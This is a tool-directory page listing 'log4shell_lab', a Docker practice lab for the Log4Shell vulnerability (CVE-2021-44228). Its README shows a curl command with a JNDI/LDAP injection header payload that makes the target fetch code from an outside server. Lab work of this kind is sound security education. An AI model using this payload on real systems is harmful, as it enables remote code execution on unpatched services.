Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/shlomirex/log4shell_lab
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubshlomirex/log4shell_lab

log4shell_lab

CVE-2021-44228

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

log4shell exploit lab

This repository is a single-line setup for log4shell exploit lab.

Setup the lab: docker-compose up -d

Run exploit: curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"

Then go to vul container and see that indeed we pwned the machine:

  • Video explaining the lab setup: https://www.youtube.com/watch?v=WBzR30JcT5g)
  • Video explaining the code: https://www.youtube.com/watch?v=oRvp0c-fa1o
Download Tool